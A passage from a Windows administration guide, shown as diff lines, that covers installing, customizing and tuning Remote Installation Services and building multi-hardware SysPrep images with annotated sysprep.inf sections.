+required for a Windows 2000 network. Finally, you need a
+Windows 2000-compliant DNS server, so that an RIS server can
+locate an Active Directory controller, and a DHCP server to
+assign TCP/IP addresses to clients, allowing them to
+communicate with a RIS server.
+Hardware requirements
+The hardware requirements for your RIS server are dependent on
+how many clients will be supported within your environment. How
+well RIS performs when deploying Windows to clients depends on
+the hardware configuration of your RIS serverin particular, the
+disk subsystem, memory, and networking components of your
+RIS server. Let's consider each of these briefly:
+Disk subsystem
+Storage space for each operating system image you
+want to deploy must be taken into account, because the
+size will vary depending on the level of customization,
+size of images and applications included with each
+image, and so on. The RIS installation point cannot be
+on the same volume that the operating system and/or
+boot files are on. It must be installed on a separate
+
+dedicated volume.
+Memory
+In addition to the memory allocated to the operating
+system, allocate additional memory for the RIS service.
+Microsoft recommends a minimum of 128 MB for
+Windows 2000 Server, but I recommend 512 MB for the
+services and functions this server will be providing, as
+well as the number of clients it might be supporting.
+Networking components
+A network adapter running at 100 Mbps full duplex is
+best. If you are supporting a large client base, you might
+want to have two 10/100 adapters. Solid network
+connectivity between client and server is important, and
+you must consider your network topology when planning
+a RIS implementation.
+As with other Microsoft services you provide on your network,
+proper planning will help you to determine the configuration of
+your RIS server, how many you may need, and the placement of
+them. RIS can run on a member server that provides other
+services on your network; you just need to determine the impact
+and whether additional hardware is required to support the
+additional services.
+Services associated with RIS
+
+RIS relies on three services to provide the capabilities it offers:
+Boot Information Negotiation Layer (BINL)
+The BINL service listens for and answers client DHCP
+requests (PXE). It also services Client Installation
+Wizard requests. BINL directs the client to the files
+needed to start the installation process. This service
+also checks Active Directory to verify credentials,
+determine whether a client needs a service, and
+determines whether to create a new computer account
+object or reset an existing one on behalf of the client.
+Trivial File Transfer Protocol Daemon (TFTPD)
+An RIS server uses Trivial File Transfer Protocol (TFTP)
+to download the initial files needed to begin the remote
+installation process to the client. These files include the
+Client Installation Wizard and all files needed to start
+Windows 2000 setup. The first file downloaded to the
+client using TFTP is Startrom.com, a small bootstrap
+program that displays the Press F12 for Network
+Service Boot prompt. If F12 is pressed within three
+seconds, the Client Installation Wizard (OSChooser) is
+downloaded to begin the remote installation process.
+When it resides on the server side, this service is called
+the Trivial File Transfer Protocol Daemon (TFTPD). When
+it resides on the client, it is simply called TFTP.
+Single Instance Store (SIS) or Groveler
+
+The SIS services consist of an NTFS filesystem filter
+and a service that acts on the volume on which the RIS
+images are kept. SIS services reduce the storage
+requirements needed to store these images by
+combining duplicate files.
+Installing RIS
+On Windows 2000 Server, go to Start Settings Control
+Panel. Double-click Add/Remove Programs, and then double-
+click Add/Remove Windows Components. Scroll down, choose
+Remote Installation Services, and then click Next. Insert the
+Windows 2000 Server CD-ROM into the CD-ROM drive and
+click OK. The necessary files are copied to the server. Click
+Finish to end the wizard. When you are prompted to restart your
+computer, click Yes. When the server has restarted, log on to the
+computer with an account that has administrative privilege.
+I recommend you always apply the latest service pack for
+Windows 2000, because it might have fixes or enhancements to
+RIS. For example, Service Pack 3 includes support for deploying
+Windows 2000 Server and Windows XP Professional (the original
+RIS supported deploying Windows 2000 Professional only) and
+resolves networking issues with RIS clients and installation
+issues (such as RIS clients hanging during setup). There are
+also specific hotfixes for RIS, but these are available only if you
+are experiencing the specific issue and they require a call into
+Microsoft support to obtain the update.
+The directory structure of RIS is flexible; it is designed to
+support many different languages and hardware platforms. The
+following directories are created for the RIS service during
+installation.
+
+OSChooser
+This directory contains all of the files needed by the
+client installation wizard. As noted, the OSChooser
+directory supports many different types of hardware
+platforms and languages. However, only the x86 platform
+is supported for RIS in Windows 2000.
+Setup
+This directory contains the images that have been
+installed on the RIS server. Notice that the existing
+operating system images also contain a corresponding
+Templates directory, which contains the SIF file used for
+unattended installation of the operating system on the
+client computer. The SIF file also contains the friendly
+description string and specific image details that are
+displayed to end users of the client installation wizard
+and in the Tools tab within the administrative UI. Note
+that for an image to be displayed in both the
+administrative UI and the client-installation-wizard UI,
+it must contain an associated *.sif file template.
+Tools
+This directory contains tools that are designed to
+support deployment through RIS, such as BIOS
+updates, virus tools, and so on.
+To set up RIS after installation, go to the command prompt or
+Start Run and type RISETUP.EXE to start the Remote
+
+Installation Service Setup Wizard. Follow the instructions on the
+screen. It will guide you through configuring RIS, and the last
+step will be to create an image of your Windows 2000
+Server/Professional or Windows XP Professional from the CD. I
+won't get into detail here, because it is a straightforward
+process, but see Microsoft Knowledge Base article Q298750
+(http://support.microsoft.com/default.aspx?scid=kb;en-
+us;298750) for any assistance you might need.
+Once you complete the process of configuring RIS, the server
+must be authorized in Active Directory. This ensures that rogue
+servers with those services installed (either by accident or
+intentionally), will not impact or disrupt network operations. Log
+onto a domain controller in the root domain with Domain
+Administrator or Enterprise Administrator rights. Go to Start
+Programs Administrative Tools and click on the DHCP
+snap-in. Right-click DHCP in the upper-left corner of the screen,
+and then click Manage Authorized Servers. If the RIS server
+does not appear in the list, click Authorize and enter the IP
+address of the server.
+Once you're finished setting up RIS, you can customize it to the
+needs of your own networking environment [Hack #63].
+Matt Goedtel
+
+Hack 63 Customize RIS
+Once you know the basics of setting up RIS, you can customize
+it for the needs of your own networking environment.
+In [Hack #62], we looked at how to install and set up RIS on a
+Windows 2000-based network. Once RIS is successfully
+installed and authorized in Active Directory, you are ready to
+customize your RIS settings to meet your needs. This might
+include setting installation restrictions, defining a computer-
+naming policy, configuring client response options, prestaging
+clients in Active Directory, and permitting clients to install
+operating system images.
+Configuring RIS
+To configure the RIS server to respond to client requests, you
+need to log onto one of your domain controllers or install the
+Administrative Tools package (adminpak.msi) on the member
+server that is running the Remote Installation Service. Execute
+the Users and Computers MMC snap-in, right-click on the
+server that is running RIS, and you will see a tab labeled Remote
+Install. On this tab, you can enable RIS to respond to client
+requests (which is enabled by default) and enable the option to
+not respond to unknown clients. This ensures that you support
+only prestaged computer account objects in your forest as part
+of your security strategy. If you have multiple RIS servers as
+
+part of a load-balancing strategy and one fails or is unstable,
+you can deselect the option to allow it to respond to client
+requests.
+The Advanced Settings button displays a window that allows you
+to configure additional settings for RIS clients, such as the
+default computer name that is generated for each client when a
+user selects Automatic Setup on the Client Installation Wizard
+(CIW) screen. By default, the username of the user who
+authenticated in the CIW is used for the computer name, along
+with a number. The username can be customized to use different
+variations, which you can control by using variables recognized
+by Active Directory and the BINL service. For example,
+CorpWks%# = CorpWks2 uses a number incremented each time a
+computer account is generated when an image is
+deployed/installed via RIS. You can refer to online help or
+Microsoft TechNet for other variables or variations.
+Taking advantage of the Advanced Settings is dependent on the
+standards currently implemented in your environment. If you
+have different standards per department, site, or domain, you will
+need to determine if you can leverage this feature. You might
+need to use a different solution during the build process. If you
+are predefining the computer names, which are matched to the
+unique GUID of that workstation, then this is a nonissue. In this
+screen, you also have the option of specifying the organizational
+unit (OU) in which the computer accounts are created. By
+default, they are created in the Computers container.
+Predefining computer accounts in RIS
+If you are security-conscious or want to ensure that systems
+are not arbitrarily imaged from RIS without approval, you should
+
+enable the "Do not respond to unknown computers" option on
+the RIS server. This also allows for greater flexibility, but it
+requires some up-front work on the administrator's part.
+Specifically, you can precreate the computer accounts in their
+respective OUs in Active Directory. Based on the organizational
+structure of the company and delegation of administration, this
+will also have some bearing on how you plan your
+implementation of RIS.
+When precreating the computer accounts, you need to select the
+"This is a managed computer" option and the GUID of that
+computer is required. For computers that come from one of the
+leading PC vendorssuch as Compaq, HP, or Gatewaythe GUID
+can be found on a sticker adhered to the PC case. If the system
+does not have that sticker, you can create the GUID by using
+the MAC address of the network card installed in the PC, or you
+can boot up the PC and access the BIOS; the GUID might be
+displayed on the main screen. When using the MAC address of
+the network card, since the GUID is a 32-byte value, you need
+to pad the first 20 bytes with zeros; the remaining 12 bytes is
+the MAC address.
+To load-balance your RIS servers manually, when you create the
+computer account and specify it is a managed computer, you can
+specify the RIS server to own (i.e., support) the client. I don't
+like this approach, because there is too much overhead
+management. Also, if the server were to become unavailable,
+your clients would be unable to obtain any images, updates, or
+components until that server became available again. Setting up
+a dynamic load-balancing solution with RISby defining one RIS
+server as the bridgehead and all other RIS servers behind it to
+serve only the imagesis a better approach. I have not used any
+other approach, but I have been looking into how to leverage
+clustering or other solutions to further bolster the redundancy of
+RIS.
+
+Client Installation Wizard
+The screens that are presented to the client when he interfaces
+with RIS are in OSCML format (similar to HTML and modeled
+after HTML 2.0 format) and have a .osc extension. You have
+great flexibility in how to present those screens to clients, based
+on your organizational needs and a touch of personalization (e.g.,
+adding your company name to display in the screens). There are
+also state variables that you can use to make your image
+installations more dynamic; the values of the response are
+passed back via BINL to the answer file located in the template
+folder of the particular image. You can have up to 64 unique
+variables to use with the CIW. All variables, with the exception
+of the %LANGUAGE% variable, are set after successful login. As
+always, make a backup copy before modifying the original file, in
+case you run into an error or you want to revert back to the
+original for any reason.
+OSChooser and the BINL service use the following variables:
+LANGUAGE
+The only variable that can be set prior to logon. This
+variable indicates the language in which the user wants
+to view the screens. All OSC screens, as well as any
+ENUM functions the server performs, are pulled from that
+language. The default value of this variable matches the
+default language of the server. Refer to the Multilng.osc
+file located in the RemoteInstall\Oschooser directory for
+an example of how to make the server multilingual.
+
+SUBERROR
+The server sets this variable internally for any errors it
+encounters. You can add this variable to an error
+message screen to diagnose internal failures inside the
+server.
+MACHINEOU
+Indicates to the server where the new machine account
+should be generated.
+MACHINENAME
+Indicates to the server the name of the new machine.
+SERVERNAME
+Indicates the name of the server to which OSChooser is
+connected.
+SERVERDOMAIN
+Indicates the domain name of the server to which
+OSChooser is connected.
+BOOTFILE
+Indicates when a tool is about to be started.
+
+NETBIOSNAME
+The NetBIOS name generated (using the
+DnsHostnameToComputerName( ) call) for the computer on
+which the image is being installed.
+SIFFILE
+This variable is local to the server path of the SIF that
+the user selected to install the OS. It is similar to the
+following example:
+X:\RemoteInstall\Setup\English\Images\Win2000.pro\I386\Templates\Ristndrd.sif
+OPTIONS
+This variable is filled with the results of an ENUM action by
+the server. It contains OSCML and should be placed
+between a tag and a tag. See the
+Tools.osc file located in the
+RemoteInstall\Oschooser\%Language% directory for an
+example.
+MACHINEDOMAIN
+The domain that the new client attempts to join during
+GUI-mode setup. This might not correspond to the
+MACHINEOU variable's domain.
+
+SYSPREPPATH
+The path to the sources for a Riprep-based image if you
+use Riprep.exe to create your images. For example:
+X:\RemoteInstall\Setup\English\Images\Win2000.prep\I386
+INSTALLPATH
+The TFTP relative path to the installation imagefor
+example, Setup\English\Images\Win2000.pro.
+SYSPREPDRIVERS
+Indicates the path the server thinks best fits the Riprep-
+based image. This path is used to find plug and play
+drivers.
+MAC
+Sent by OSChooser to indicate the MAC address of the
+client.
+GUID
+Sent by OSChooser to indicate the GUID address of the
+client.
+MACHINETYPE
+
+Sent by OSChooser to indicate the type of hardware on
+which OSChooser is running. For example, on Intel
+platforms, you would use INTEL = "i386"
+USERNAME, *PASSWORD, USERDOMAIN
+OSChooser looks for the credentials specified by these
+three values to process the logon request. *PASSWORD is a
+short-lived variable that is overwritten as soon as
+possible on the server and is not accessible to OSC
+files or SIF files.
+TIMEZONE
+Set by the server to the server's current time-zone
+setting. This setting is helpful if you are replicating
+images to remote servers in different time zones.
+RIS Custom Installation Wizard
+Now, let's look at how to customize the RIS Custom Installation
+Wizard screens and how you can modify them to suit your
+environment. Here are the default screens that are displayed
+during the client login and installation process when deploying
+operating system images to clients using RIS:
+Welcome.osc
+Displays the welcome screen to the user.
+
+Login.osc
+Displays the login screen and requires the user to log
+into the domain.
+Choice.osc
+Displays the setup optionsAutomatic, Custom, Restart,
+Maintenance, and Toolsto the user. Remote Installation
+Service (RIS) Group Policy settings control which
+options appear.
+OSAuto.osc
+Determines whether a computer account already exists
+in Active Directory with the same GUID as the computer
+that is running Client Installation Wizard. If a duplicate
+is found, DupAuto.osc is displayed. If no duplicate is
+found, then OSChoice.osc is displayed.
+DupAuto.osc
+Displays a message indicating that a duplicate GUID
+was found in Active Directory and instructs the user to
+contact the network administrator.
+OSChoice.osc
+
+Displays the list of operating system images available
+to the user who logged onto the RIS server.
+Warning.osc
+Displays a warning to the user that the hard drive is
+going to be formatted and all information will be lost.
+Install.osc
+Displays a summary page to the user.
+All these screens are modeled after HTML Version 2.0
+specifications and are simple text files with an .osc extension,
+indicating they are in the format of OSChooser Markup Language
+(OSCML). All of these files are installed in the
+RemoteInstall\OSChooser\ folder. The files listed in this
+hack are only a subset of the total number of .osc files stored in
+this folder. With these files, you customize client login screens in
+a variety of ways, including changing the text in the title or in the
+main body and adding additional input fields. You can then use
+that new information to further tailor the unattended installation
+of your Windows OS image through RIS. When working with
+different languages, you will need to modify Multiling.osc to list
+the languages that will be supported by RIS; then, rename
+Multiling.osc to Welcome.osc.
+There are 24 predefined variables you can use within your own
+custom screens or answer files. These variables are available
+only in the Install.osc file and in the answer file. Some variables
+have predefined values, while others do not. To learn more about
+the predefined variables, see the following URL at Microsoft's
+web site:
+
+http://www.microsoft.com/windows2000/techinfo/reskit/en-
+us/default.asp?url=/windows2000/techinfo/reskit/en-
+us/distrib/dsed_dpl_flwz.asp
+To learn more about configuring your own Custom Installation
+Wizard screens, see the following Microsoft Windows 2000
+Resource Kit article, which breaks down the tags that are
+supported in OSCML:
+http://www.microsoft.com/windows2000/techinfo/reskit/en-
+us/default.asp?url=/windows2000/techinfo/reskit/en-
+us/distrib/dsed_dpl_KEMO.asp
+You have a great deal of flexibility when hacking the screens
+used in RIS; you can even create your own screens to request
+information for your automated build. Say you want to create a
+screen to prompt for the local administrator account password,
+the location of the user's computer, and so on. With the default
+screens and the reference material provided by Microsoft, you
+are on your way.
+Deploying Windows Images
+Configuring RIS to deploy Windows images is a simple and
+straightforward task. However, there are limitations to
+configuring RIS with Windows 2000 and Windows XP images.
+You cannot slipstream service packs into the i386 image on an
+RIS server for Windows 2000 Professional images. To handle
+this issue, see Microsoft Knowledge Base Article 258868
+(http://support.microsoft.com/default.aspx?scid=kb;en-
+us;258868).
+When you want to slipstream SP1 into a Windows XP image, you
+
+will need to obtain a hotfix from Microsoft, because there are
+security changes in SP1 for Windows XP. See Microsoft Q Article
+327536 (http://support.microsoft.com/default.aspx?
+scid=kb;en-us;327536) to obtain the hotfix.
+Beyond those two important items, you might also run across
+minor compatibility issues with video and network cards.
+If you have Service Pack 3 for Windows 2000 installed on your
+RIS server, you will also be able to support the deployment of
+Windows 2000 Server.
+To add additional images to RIS for deployment, execute
+RISSetup.exe. This executable also accepts two command-line
+parameters:
+-check
+Runs only the server component of RIS setup. It
+performs a verification of the components of RIS and
+corrects them.
+-add
+Installs a new CD-ROM-based version of Windows XP
+Professional, Windows 2000 Professional, or Windows
+2000 Server.
+I recommend you keep handy the deployment guides that
+complement Windows 2000 or Windows XP and refer to them
+when you are customizing a build for automated deployment.
+Also, keep an eye out for any new material posted by Microsoft
+or the other technical resources on the Web, to help you along
+the way. Reference material is always a good thing.
+
+Once you've customized RIS for your own environment, you
+might need to tune it further to make RIS server run effectively
+[Hack #64].
+Matt Goedtel
+
+Hack 64 Tune RIS
+If you can't afford the resources to run a dedicated RIS server
+for your environment, you can use RIS on a dual-purpose
+serveras long as you tune it carefully.
+Let's talk about fine-tuning RIS if there are other folders on the
+volume (i.e., other than the OS images used by RIS) and how to
+handle the restoration of the volume managed by SIS. To do this,
+we will have to dig deeper into how SIS works.
+By storing a only a single copy of data in a folder on the volume,
+SIS helps reduce the amount of disk space that contains the OS
+images used by RIS. When SIS Groveler starts, it searches the
+root of each NTFS volume to see if it contains the SIS folder
+named SIS Common Store and a file called MaxIndex within that
+directory. If the Groveler finds this folder and file and if the SIS
+filter driver is installed on the system, the Groveler knows to
+search for and consolidate duplicate files on the volume.
+SIS uses the same technology as the Indexing Service, and it is
+designed to not consume CPU time when the system requires it
+for other functions. The exception is when disk space drops
+below a specific value; in this case, the Groveler will increase
+CPU usage regardless of system activity, to ensure that disk
+space is not entirely consumed.
+To effectively manage duplicate files that it detects when
+scanning a volume, SIS places the data in the SIS common
+store and the original files are changed to reparse points with
+
+referrals to the .sis file. When the application tries to
+access the original file, the filesystem redirects any file I/O to
+the .sis file in SIS Common Store. For example, if SIS
+detects the file net1.ex_ in both the
+RIS\SETUP\ENGLISH\IMAGES\WindowsXP.Pro\i386 and
+\SETUP\ENGLISH\IMAGES\WindowsXP.Pro.SP1\i386 folders, it
+places the duplicate file in the SIS common store and the
+references of those files are changed to reparse points with
+referrals (or links) to the .sis file.
+Now, let's say you have a dual-purpose Windows 2000 Server
+that is both a file-sharing server and a RIS server. The volume
+that houses the RIS OS images also has the file shares. When
+the Groveler service performs its daily ritual, it will scan through
+all folders on that volume. To improve efficiency of SIS and
+restore SIS links or reparse points, you can exclude certain
+directories from the Groveler scan.
+To exclude a directory on a single volume, modify the Grovel.ini
+file located in the SIS Common Store folder (this folder is hidden
+by default). First, you will need to modify the NTFS permissions
+of the folder, because only SYSTEM has full control rights by
+default. Then, under the [Excluded Paths] section, add the
+required entryfor example, Directory 1 Folder = \Folder1. Note
+that the value to the left of the equals sign can be of any
+designation you wish. Now, stop and restart the Single Instance
+Storage service and you're done.
+To exclude a directory on all volumes, open Registry Editor and
+add an entry to the following key:
+HKLM\Software\Microsoft\Windows NT\CurrentVersion\Groveler\ExcludedPaths
+The value can have any namefor example, Folder 1 Directory
+REG_SZ \Folder1. Again, after you've done this, stop and restart
+the Single Instance Storage service.
+
+In an enterprise environment, you should have a dedicated
+Windows 2000 server or servers to provide RIS images,
+depending on how many desktops you are supporting. In a
+smaller environment, it is reasonable to have a multipurpose
+server provide RIS, as long as it has the resources to support
+the additional overhead.
+Finally, to restore a volume that is managed by SIS, follow the
+instructions in KB Article 263027
+(http://support.microsoft.com/default.aspx?scid=kb;en-
+us;263027). How you handle a restore depends on the failure
+you are faced with, such as failed disk drives, controllers, or the
+like. Follow this article carefully to ensure you are not faced with
+data corruption because of the linked files managed by SIS!
+For more helpful information on using RIS to deploy Windows,
+see my column at myITforum.com (http://www.myitforum.com).
+Matt Goedtel
+
+Hack 65 Customize SysPrep
+Using SysPrep to deploy Windows can be a nightmare, unless
+you find a way to minimize the number of images you have to
+maintain.
+Are you in charge of imaging workstations in your company? Do
+you have multiple hardware platforms deployed throughout your
+company? Do you maintain more than five images of those
+workstations? If you answered "yes" to any of these questions,
+then this hack might just ease your workload. By using
+Microsoft's SysPrep utility, system administrators can reduce
+the number of PC images that are maintained on a daily basis.
+Using the approach in this hack, I have moved away from
+maintaining between 15 and 20 images and now have to update
+only 2 or 3 images for our entire company. I support nearly a
+dozen different types of workstation hardware, including several
+hardware specifications for laptops. SysPrep, while not
+inherently easy to configure or understand, is well worth the time
+and energy invested.
+Getting Started
+On the lowest platform deployed at your company, install the
+operating system and leave the administrator account password
+blank. By leaving the administrator password blank, you prevent
+
+passing it in plain text via the sysprep.inf file. For our example,
+we'll use the following credentials:
+Name: Company Name
+Organization: Company Name
+Computer Name: XXXXXX (whatever you want)
+Administrator Password: (blank)
+Create an administrative equivalent account called Test with a
+password:
+UserID: Test (or whatever else you want to use)
+Password: test! (or whatever)
+Now, decide on the Network Options. Check the radio button
+that reads "Users must enter a user name and password to use
+the computer" or "Leave the machine connected to the
+WORKGROUP." Once the operating system is installed, build a
+new image from scratch by using the Test account. This image
+should include the latest operating service pack and security
+patches, in addition to all software that is to be included in the
+base image. So that you don't have to rely on hindsight, it is
+recommended that you upload this base image before applying
+the SysPrep files. That way, if something goes wrong with the
+SysPrep process, you still have a valid image and won't have to
+reinstall all the software again. Make sure to keep this uploaded
+base image separate from all other SysPrep-generated images.
+Naming the image NoSysPrep might be a good naming
+convention.
+Now, create a folder called C:\SysPrep on the base-image
+machine. Copy the following files to the newly created folder:
+Sysprep.exe
+
+Prepares the hard drive on the master computer for
+duplication
+Setupcl.exe
+Regenerates new SIDs for the computers
+Pnpids.exe
+Helps you identify common names for supported Plug
+and Play devices
+Msdpnp.txt
+Contains inf settings for supported devices
+Sysprep.inf
+The answer file to be used for applying an unattended
+image to a machine
+Now, copy all drivers, for all hardware platforms, to
+C:\SysPrep\Drivers from wherever they reside (whether on a CD-
+ROM or a network drive). This directory structure will be used
+when you modify the sysprep.inf file. Note that it is important to
+download the latest drivers for every type of hardware platform in
+your company. If hard-drive space is not an issue, it might be a
+good idea to place all device drivers in separate folders for each
+unique hardware platform in your company.
+
+Once all the drivers are copied locally, log out of the Test
+account and log on as administrator. (The password should still
+be blank at this point.) Delete the Test Profile by right-clicking
+on My Computer and selecting Properties. Then, from the User
+Profiles tab, highlight the Test Account and press the Delete
+key. Next, delete the Test account by right-clicking on My
+Computer, selecting Manage, expanding Local Users and
+Groups, highlighting Test Account, and pressing the Delete key.
+Run Disk Cleanup (Start Programs Accessories
+System Tools Disk Cleanup). Then, remove the following two
+entries from the Registry to keep the base image tidy:
+HKLM\Microsoft\Windows\CurrentVersion\RecentDocs
+HKLM\Microsoft\Windows\CurrentVersion\ RunMRU
+Change the administrator password from blank to something
+appropriate to the security needs of your environment. Then,
+from the command prompt, run the following command:
+C:\SysPrep\sysprep.exe -pnp
+By running the sysprep.exe utility, the PC will be powered down
+once you click OK. This might take several minutes to complete.
+The -pnp parameter here indicates Plug and Play.
+Now, upload new image and name it SysImage to prevent
+overwriting the original image. Upon reboot, the SysPrep wizard
+will run, finding all drivers for each particular hardware device in
+the system.
+Understanding the SysPrep.inf
+
+The key to making SysPrep work on multiple hardware platforms
+lies in customizing the SysPrep.inf file and the command used to
+invoke the sysprep.exe utility. This following sections explain
+each section of the SysPrep.inf file. The following code is taken
+directly from the sysprep.inf file included with the utility, along
+with my explanations.
+SysPrepMassStorage
+The key to the SysPrep.inf file lies within the SysPrepMassStorage
+section:
+[SysPrepMassStorage]
+Primary_IDE_Channel=%windir%\inf\mshdc.inf
+Secondary_IDE_Channel=%windir%\inf\mshdc.inf
+These two strings tell the operating system where to look for the
+IDE drivers. When you run a full-blown Setup from any Windows
+setup disk, Setup goes out and looks for the default IDE drivers
+for the primary and secondary IDE controllers before the GUI
+phase of Setup begins. After it finds the default drivers, it
+continues with whatever task it needs to perform. After all the
+files have been copied over and the setup is completed, it will
+either keep the default IDE drivers or look for a more updated
+one from the path provided in the SysPrep.inf answer file. It
+rarely prompts for an updated driver, unless you have another
+IDE controller installed (i.e., in addition to the primary and
+secondary controllers).
+Note that %windir% is the environment variable used to describe
+the location of the Windows files. For Windows NT/2000
+
+operating systems, the Windows files are located in C:\Winnt. For
+Windows 9x/XP operating systems, Windows files are located in
+C:\Windows. By using this environment variable, the SysPrep.inf
+file can be used for nearly all operating systems without
+additional coding.
+The Mshdc.inf file references the Microsoft Hard Drive Controller
+.inf file.
+PCMCIA\*PNP0600=%systemroot%\inf\mshdc.inf
+*PNP0600=%systemroot%\inf\mshdc.inf
+PCMCIA\KME-KXLC005-A99E=%systemroot%\inf\mshdc.inf
+PCMCIA\_-NinjaATA--3768=%systemroot%\inf\mshdc.inf
+PCMCIA\FUJITSU-IDE-PC_CARD-DDF2=%systemroot%\inf\mshdc.inf
+*AZT0502=%systemroot%\inf\mshdc.inf
+PCI\VEN_10B9&DEV_5215=%systemroot%\inf\mshdc.inf
+PCI\VEN_10B9&DEV_5219=%systemroot%\inf\mshdc.inf
+PCI\VEN_10B9&DEV_5229=%systemroot%\inf\mshdc.inf
+PCI\VEN_1097&DEV_0038=%systemroot%\inf\mshdc.inf
+PCI\VEN_1095&DEV_0640=%systemroot%\inf\mshdc.inf
+PCI\VEN_1095&DEV_0646=%systemroot%\inf\mshdc.inf
+PCI\VEN_0E11&DEV_AE33=%systemroot%\inf\mshdc.inf
+PCI\VEN_8086&DEV_1222=%systemroot%\inf\mshdc.inf
+
+PCI\VEN_8086&DEV_1230=%systemroot%\inf\mshdc.inf
+PCI\VEN_8086&DEV_7010=%systemroot%\inf\mshdc.inf
+PCI\VEN_8086&DEV_7111=%systemroot%\inf\mshdc.inf
+PCI\VEN_8086&DEV_2411=%systemroot%\inf\mshdc.inf
+PCI\VEN_8086&DEV_2421=%systemroot%\inf\mshdc.inf
+PCI\VEN_8086&DEV_7199=%systemroot%\inf\mshdc.inf
+PCI\VEN_1042&DEV_1000=%systemroot%\inf\mshdc.inf
+PCI\VEN_1039&DEV_0601=%systemroot%\inf\mshdc.inf
+PCI\VEN_1039&DEV_5513=%systemroot%\inf\mshdc.inf
+PCI\VEN_10AD&DEV_0001=%systemroot%\inf\mshdc.inf
+PCI\VEN_10AD&DEV_0150=%systemroot%\inf\mshdc.inf
+PCI\VEN_105A&DEV_4D33=%systemroot%\inf\mshdc.inf
+PCI\VEN_10AD&DEV_0571=%systemroot%\inf\mshdc.inf
+Referring back to the SysPrepMassStorage section of Sysprep.inf,
+the two strings below the primary/secondary controllers (not
+shown) are unique IDE drivers for your own specific hardware. If
+you have a unique IDE controller and would like to use drivers
+other than the MS defaults, you can add them to this section.
+You must be very careful when adding a line in the
+SysPrepMassStorage section of the .inf file. By using only the
+downloaded drivers, instead of the Microsoft default drivers, you
+
+might get an error message stating that there is an invalid disk.
+If you are running a different IDE driver, you might want to run
+the driver setup at the end of the SysPrep process. This can be
+accomplished by placing the setup string in the RunOnce section
+of the SysPrep.inf answer file. This should then update the IDE
+controller to the driver that you prefer to use, in addition to
+creating a stable SysPrep run.
+Another thing to consider is an already-configured IDE
+controller that is a part of your base image. You might lose the
+updated IDE driver, because the SysPrep setup-wizard
+parameter pnp (Plug and Play) will overwrite your preconfigured
+driver. There is a way around this SysPrep feature: omit the pnp
+parameter when you run sysprep.exe. Omitting the pnp parameter
+when you run SysPrep runs only a portion of PnP process and
+not the full PnP feature.
+While this might prevent the loss of a preconfigured IDE driver
+on your workstation image, you should use caution when you
+choose not to run the full pnp parameter. Running the full pnp
+parameter as a part of the SysPrep process will indeed allow one
+image to locate and install a variety of unsupported hardware
+configurations. If the default Microsoft IDE driver or the specific
+IDE driver is not detected, then SysPrep will not run correctly.
+Unattended
+The following lines in the Unattended section mean that the whole
+SysPrep setup will not stop or pause for anything. Note that you
+can document the SysPrep.inf file by using a semicolon as a
+comment marker, as shown here above the actual command:
+
+[Unattended]
+; the following optional line means setup won't pause for anything, including errors
+UnattendedMode = FullUnattended
+The following lines skip the license agreement and any other
+prompts dealing with licensing:
+OemSkipEula = Yes
+OemPreinstall = No
+The following line tells SysPrep the folder location for hardware-
+specific drivers that are not included with the operating system:
+OemPnPDriversPath = sysprep\Drivers\1\NIC;sysprep\Drivers\1\Sound\W2k;sysprep\Drivers\1\
+Sound;sysprep\Drivers\1\video;sysprep\Drivers\6\NIC;sysprep\Drivers\7\NIC;sysprep\Drivers\
+7\Video;sysprep\Drivers\8\NIC;sysprep\Drivers\8\Sound;sysprep\Drivers\8\Video;sysprep|
+Drivers\Evo\3c0XNic;sysprep\Drivers\Evo\IntelNic;sysprep\Drivers\Evo\Nvidia;sysprep\
+Drivers\Evo\Sound;sysprep\Drivers\Evo\Sound\Smaxwdm\W2k;sysprep\Vli8\Keyboard;sysprep\
+Vli8\NIC;sysprep\VLi8\Sound;sysprep\Vli8\Video
+Typically, you should copy all drivers into a C:\Drivers folder and
+separate them on a machine-by-machine basis. To keep this line
+from becoming unmanageable, abbreviate hardware-specific
+folders and document them accordingly. In this particular
+instance, the 6 represents hardware running at 600 Mhz, 7
+represents 733 Mhz, 8 represents 866 Mhz, and so on. Use any
+method that fits your environment.
+If the image you created has all the drivers for all the different
+
+hardware, then the OEMPNPDRIVERSPATH is not needed. However, I
+recommend you reference all drivers, just in case the
+manufacturer makes any hardware changes. You do have to copy
+all the drivers into the SysPrep folder. The space is lost for the
+image but will be reclaimed after SysPrep finishes, because the
+image automatically deletes itself. Just make sure that the
+drivers you need are inside the SysPrep folder.
+GuiUnattended
+In the GuiUnattended section, the asterisk beside AdminPassword
+means the local administrator password is blank:
+[GuiUnattended]
+AdminPassword=*
+OEMSkipRegional=1
+TimeZone=20
+OemSkipWelcome=1
+By having a configured local administrator password on your
+image, this SysPrep answer file will not null out the password,
+keeping the password the same. This creates good security by
+not passing the administrator password via the SysPrep.inf file.
+UserData
+
+The UserData section is pretty self-explanatory:
+[UserData]
+FullName="YourCompanyNameGoesHere"
+OrgName="YourCompanyNameGoesHere"
+ComputerName=xxxxxx
+Productid=License info goes here
+Display
+By configuring the screen settings in the Display section, you
+can prevent the screen from coming up to the far-right or far-left
+side of the monitor. The display will be centered. These settings
+can be configured to suit your company's needs:
+[Display]
+ConfigureAtLogon=0
+BitsPerPel=16
+XResolution=1024
+YResolution=768
+VRefresh=75
+AutoConfirm=1
+
+The BitsPerPel section references the color. Make sure to check
+the hardware compatibility with a hardware refresh rate
+(VRefresh). A refresh rate of 75 should work for most hardware,
+but sometimes 65 is a better option. The AutoConfirm setting is
+enabled so that confirmation is already set, thus preventing a
+change back to the default setting.
+Identification
+The Identification section configures a PC to join a specific
+workgroup:
+[Identification]
+JoinWorkgroup=WORKGROUP
+The workgroup name can be almost anything. If you want to have
+the PC automatically join a domain, other command lines are
+needed.
+Networking
+The Networking section tells SysPrep to use the default network
+settings, including Client for Microsoft Networks, File and Printer
+Sharing, and TCP/IP (DHCP):
+[Networking]
+InstallDefaultComponents=Yes
+
+Within this section you can also add additional protocols,
+clients, services, static IP, and other networking options.
+The only issue I have encountered, when running sysprep.exe
+with the -pnp switch (which causes SysPrep to perform a full
+device enumeration using Plug and Play), is that my company's
+preconfigured DNS settings are overwritten because the network
+card is redetected during the SysPrep process. A possible
+solution to this issue is to add a line in the RunOnce section of the
+SysPrep.inf file that will automate reconfiguring those DNS
+entries.
+GuiRunOnce
+Finally, by adding the following line to the GuiRunOnce section of
+the SysPrep.inf file, a script is run from the local machine:
+[GuiRunOnce]
+Command0=C:\temp\Scriptfile
+The script file can perform a wide variety of commands. Be sure
+the file exists on the machine before you reference the command
+in the SysPrep answer file.
+Now you know how to customize the SysPrep.inf file for your
